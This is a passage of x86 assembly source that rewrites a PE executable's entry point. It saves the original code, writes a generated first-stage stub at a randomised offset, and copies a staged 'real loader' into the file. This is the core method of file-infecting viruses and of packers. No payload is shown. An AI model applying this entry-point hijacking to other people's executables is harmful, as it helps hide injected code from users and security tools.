	push ebx
	
	push esi
	mov eax, [esi.LoaderInfo.CurrentOffset]
	mov ebx, eax
	add eax, 64h
	invoke IntervalRand, ebx, eax
	mov [NextStageOff], eax
	
	mov [esi.LoaderInfo.CurrentOffset], eax
	
	mov edi, [esi.LoaderInfo.pPEInfo]
	invoke OffsetToRva, eax, [edi.PEInfo.ImageNtHeaders]
	mov [NextStageRVA], eax
	
	lea ebx, [ebp-10Ch]
	invoke Build1Loader, edi, ebx, [NextStageRVA]
	mov [ebp-04], eax
	
	mov eax, [esi.LoaderInfo.CurrentOffset]
	add eax, 64h
	mov [OldCodeOffs], eax
	
	mov ebx, [edi.PEInfo.ImageNtHeaders]
	
	push esi
	push edi
	push eax
	invoke RvaToOffset, [ebx.IMAGE_NT_HEADERS.OptionalHeader.IMAGE_OPTIONAL_HEADER.AddressOfEntryPoint], [edi.PEInfo.ImageNtHeaders]
	add eax, [edi.PEInfo.FileBase]
	mov esi, eax
	pop eax
	add eax, [edi.PEInfo.FileBase]
	mov edi, eax
	mov ecx, [ebp-04]
	rep movsb
	pop edi
	pop esi
	
	mov eax, [OEPRva]
	invoke RvaToOffset, eax, [edi.PEInfo.ImageNtHeaders]
	add eax, [edi.PEInfo.FileBase]
	push esi
	push edi
	lea esi, [ebp-10Ch]
	mov edi, eax
	mov ecx, [ebp-04h]
	rep movsb
	pop edi
	pop esi
	
	add [esi.LoaderInfo.CurrentOffset], 64h
	mov eax, [ebp-04h]
	add [esi.LoaderInfo.CurrentOffset], eax
	mov [OldCodeSize], eax
	
	add [esi.LoaderInfo.CurrentOffset], real_loader_size
	
	call PrepareRealLoader
	
	lea eax, real_loader_start
	mov ebx, [esi.LoaderInfo.CurrentOffset]
	sub ebx, real_loader_size
	add ebx, [edi.PEInfo.FileBase]
	push esi
	push edi
	mov esi, eax
	mov edi, ebx
	mov ecx, real_loader_end - real_loader_start
	rep movsb
	pop edi
	pop esi
	
	mov eax, [esi.LoaderInfo.CurrentOffset]
	sub eax, real_loader_size
	invoke OffsetToRva, eax, [edi.PEInfo.ImageNtHeaders]
	mov [RealLdrRVA], eax
	
	mov eax, size_ldr_data
	push eax
	mov eax, real_loader_size
	push eax
	push dword ptr [RealLdrRVA]
	mov eax, [NextStageOff]
	add eax, 15h ; 15h is the size of the instructions generated by Build1Loader
	add eax, [edi.PEInfo.FileBase]
	push eax
	push [esi.LoaderInfo.pPEInfo]
	call Build15Loader
	
	pop esi
	pop ebx
	pop edi
	
	mov esp, ebp
	pop ebp
	ret

END	